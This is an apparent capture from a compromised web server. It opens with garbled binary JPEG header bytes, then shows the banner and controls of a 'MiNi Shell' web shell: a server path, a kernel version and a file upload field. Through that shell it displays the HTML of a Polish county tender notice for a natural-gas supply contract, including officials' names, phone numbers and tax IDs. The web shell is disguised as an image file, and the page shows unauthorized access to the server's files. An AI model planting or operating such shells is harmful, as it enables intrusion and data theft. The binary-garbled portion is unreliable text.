JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200116/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200116/503239-N-2020.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 503239-N-2020 z dnia 2020-01-16 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Starostwo Powiatowe w Brzesku</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Wykonanie kompleksowej dostawy gazu ziemnego wysokometanowego typu E wraz z usługą dystrybucji na potrzeby Powiatu Brzeskiego wraz z jednostkami organizacyjnymi i budżetowymi</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Tak</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Podmiot</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Dom Dziecka w Jasieniu, adres: Jasień ul. Ks. Mazurkiewicza 171, 32-800 Brzesko, NIP: 8691652725, Agnieszka Ludkowska tel. 14/6633111</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Młodzieżowy Ośrodek Socjoterapii w Łysej Górze, adres: Łysa Góra 274, 32-853 Łysa Góra, NIP: 8691652725, Agnieszka Ludkowska tel. 14/6633111</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Powiatowy Urząd Pracy w Brzesku, adres: ul. marsz. Józefa Piłsudskiego 19, 32-800 Brzesko, NIP: 8691220919, Agnieszka Ludkowska tel. 14/6633111 </TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Starostwo Powiatowe w Brzesku, adres: ul. Głowackiego 51, 32-800 Brzesko, NIP: 8691652725, Agnieszka Ludkowska tel. 14/6633111</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Środowiskowy Dom Samopomocy im. Św. Matki Teresy z Kalkuty w Łysej Górze, adres: Łysa Góra 251, 32-853 Łysa Góra, NIP: 8691652725, Agnieszka Ludkowska tel. 14/6633111</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Komenda Powiatowa Państwowej Straży Pożarnej w Brzesku, adres: ul. Ludwika Solskiego 16, 32-800 Brzesko, NIP: 8691654210, Agnieszka Ludkowska tel. 14/6633111</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Zespół Szkół w Czchowie, adres: ul. Sądecka 187, 32-860 Czchów, NIP: 8691652725, Agnieszka Ludkowska tel. 14/6633111</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Zespół Szkół Technicznych i Branżowych im. Bohaterów Westerplatte w Brzesku, adres: ul. Piastowska 2, 32-800 Brzesko,NIP: 8691652725, Agnieszka Ludkowska tel. 14/6633111</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Zespół Szkół Ponadpodstawowych nr 1 w Brzesku, adres: ul. Gen. Leopolda Okulickiego 2, 32-800 Brzesko,NIP: 8691652725, Agnieszka Ludkowska tel. 14/6633111</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Specjalny Ośrodek Szkolno-Wychowawczy w Złotej, adres: Złota 292, 32-859 Złota, NIP: 8691652725, Agnieszka Ludkowska tel. 14/6633111</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Zarząd Dróg Powiatowych w Brzesku, adres: ul. Wyszyńskiego 6, 32-800 Brzesko ,NIP: 8691652725, Agnieszka Ludkowska tel. 14/6633111</TD></TR></TABLE> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Starostwo Powiatowe w Brzesku</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">00000000000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Głowackiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">51</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">32-800</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Brzesko</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon"></span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">starosta.kbr@powiatypolskie.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax"></span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.powiatbrzeski.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia">Za przeprowadzenie postepowania odpowiedzialne jest Starostwo Powiatowe w Brzesku.Zamawiający, działa w imieniu własnym oraz na podstawie uchwały nr 349/2020 Zarządu Powiatu Brzeskiego z dnia 10 stycznia 2020 r. w sprawie wyznaczenia jednostki organizacyjnej właściwej do przeprowadzenia postępowania i udzielenia zamówienia publicznego a także podpisanego Porozumienia z dnia 10.01.2020 r., w imieniu następujących jednostek:•	Dom Dziecka w Jasieniu•	Młodzieżowy Ośrodek Socjoterapii w Łysej Górze•	Powiatowy Urząd Pracy w Brzesku•	Środowiskowy Dom Samopomocy im. Św. Matki Teresy z Kalkuty w Łysej Górze•	Zarząd Dróg Powiatowych w Brzesku•	Specjalny Ośrodek Szkolno-Wychowawczy w Złotej•	Zespół Szkół Ponadpodstawowych nr 1 w Brzesku•	Zespół Szkół Technicznych i Branżowych im. Bohaterów Westerplatte w Brzesku•	Zespół Szkół w Czchowie•	Komenda Powiatowa Państwowej Straży Pożarnej w Brzesku4.	Powiat Brzeski oraz jednostki organizacyjne i budżetowe wymienione w zał. nr 1 do SIWZ będą zawierać odrębne umowy wynikające z niniejszego postępowania o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego na „Wykonanie kompleksowej dostawy gazu ziemnego wysokometanowego typu E wraz z usługą dystrybucji na potrzeby Powiatu Brzeskiego wraz z jednostkami organizacyjnymi i budżetowymi”.</span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">zamowienia.powiatbrzeski.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">składanie ofert odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. z 2018 poz. 2188), osobiście lub za pośrednictwem posłańca</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Starostwo Powiatowe w Brzesku, 32-800 Brzesko, ul. Głowackiego 51 (sekretariat IIp. pok nr 213)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Wykonanie kompleksowej dostawy gazu ziemnego wysokometanowego typu E wraz z usługą dystrybucji na potrzeby Powiatu Brzeskiego wraz z jednostkami organizacyjnymi i budżetowymi</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">RI.272.1.2020.MŚ</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem zamówienia jest wykonanie kompleksowej dostawy gazu ziemnego wysokometanowego typu E wraz z usługą dystrybucji na potrzeby Powiatu Brzeskiego wraz z jednostkami organizacyjnymi i budżetowymi. 2.	Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ.3.	Dostarczanie gazu odbywać się będzie na podstawie umowy zawierającej postanowienia umowy sprzedaży i umowy o świadczenie usług przesyłania lub dystrybucji gazu ( umowa kompleksowa) i będzie wykonywane zgodnie z przepisami ustawy z dnia 10 kwietnia 1997r. Prawo energetyczne (Dz. U. z 2019 r. poz. 755), Kodeksu Cywilnego oraz przepisami wykonawczymi wydanymi na ich podstawie.4.	Powiat Brzeski oraz jednostki organizacyjne i budżetowe wymienione w zał. nr 1 do SIWZ będą zawierać odrębne umowy wynikające z niniejszego postępowania o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego na „Wykonanie kompleksowej dostawy gazu ziemnego wysokometanowego typu E wraz z usługą dystrybucji na potrzeby Powiatu Brzeskiego wraz z jednostkami organizacyjnymi i budżetowymi”.5.	Zamawiający, działa w imieniu własnym oraz na podstawie uchwały nr 349/2020 Zarządu Powiatu Brzeskiego z dnia 10 stycznia 2020 r. w sprawie wyznaczenia jednostki organizacyjnej właściwej do przeprowadzenia postępowania i udzielenia zamówienia publicznego a także podpisanego Porozumienia z dnia 10.01.2020 r., w imieniu następujących jednostek:•	Dom Dziecka w Jasieniu•	Młodzieżowy Ośrodek Socjoterapii w Łysej Górze•	Powiatowy Urząd Pracy w Brzesku•	Środowiskowy Dom Samopomocy im. Św. Matki Teresy z Kalkuty w Łysej Górze•	Zarząd Dróg Powiatowych w Brzesku•	Specjalny Ośrodek Szkolno-Wychowawczy w Złotej•	Zespół Szkół Ponadpodstawowych nr 1 w Brzesku•	Zespół Szkół Technicznych i Branżowych im. Bohaterów Westerplatte w Brzesku•	Zespół Szkół w Czchowie•	Komenda Powiatowa Państwowej Straży Pożarnej w Brzesku6.	Szacunkowe zapotrzebowanie gazu ziemnego w okresie od 01.03.2020 r. do 28.02.2021 r. wynosi 3 952 575 kWh. Na koszty korzystania z przedmiotu zamówienia w ww. okresie składają się: opłata za sprzedaż gazu, opłata abonamentowa, opłata dystrybucyjna stała i opłata dystrybucyjna zmienna.7.	Zamawiający informuje, że proces zmiany sprzedawcy dla większości punktów poboru gazu odbywa się po raz kolejny. Szczegółowe informacje dotyczące okresów obowiązywania obecnych umów oraz okresy wypowiedzeń dla punktów poboru przechodzących proces zmiany sprzedawcy po raz pierwszy zawarte zostały w zał. nr 1 do SIWZ.8.	Zamawiający nie dopuszcza składanie ofert częściowych.9.	Zamawiający nie dopuszcza składania ofert wariantowych.10.	Zamawiający nie przewiduje udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 ustawy Pzp.11.	Zamawiający nie przewiduje określania w opisie przedmiotu zamówienia wymagań związanych z realizacją zamówienia, o których mowa w art. 29 ust. 4 Ustawy Pzp.12.	Zamawiający nie przewiduje przeprowadzenia aukcji elektronicznej.13.	Zamawiający nie przewiduje zawarcia umowy ramowej.14.	Zamawiający nie będzie udzielać zaliczek na poczet wykonania zamówienia.15.	Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.16.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. W takim przypadku Wykonawca jest zobowiązany do wskazania w ofercie tej części zamówienia, której wykonanie zamierza powierzyć podwykonawcom i podania firm podwykonawców.17.	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 22a ust. 1 ustawy Prawo zamówień publicznych, w celu wykazania spełniania warunków udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia. 18.	Zamawiający nie określa obowiązku zatrudnienia na podstawie art. 29 ust 3a ustawy Pzp przez Wykonawcę lub podwykonawcę na umowę o pracę osób wykonujących czynności w zakresie realizacji przedmiotu zamówienia.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">09123000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>65200000-5</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-02-28</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Z przyczyn formalno-prawnych, Zamawiający dopuszcza zmianę terminu rozpoczęcia wykonania zamówienia z zastrzeżeniem granicznego terminu wykonania zamówienia do 28 lutego 2021 r., jednak nie wcześniej niż po skutecznym rozwiązaniu umowy, na podstawie której dotychczas Zamawiający miał dostarczane paliwo gazowe oraz skutecznym przeprowadzeniu procesu zmiany sprzedawcy u Operatora Systemu Dystrybucyjnego.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W 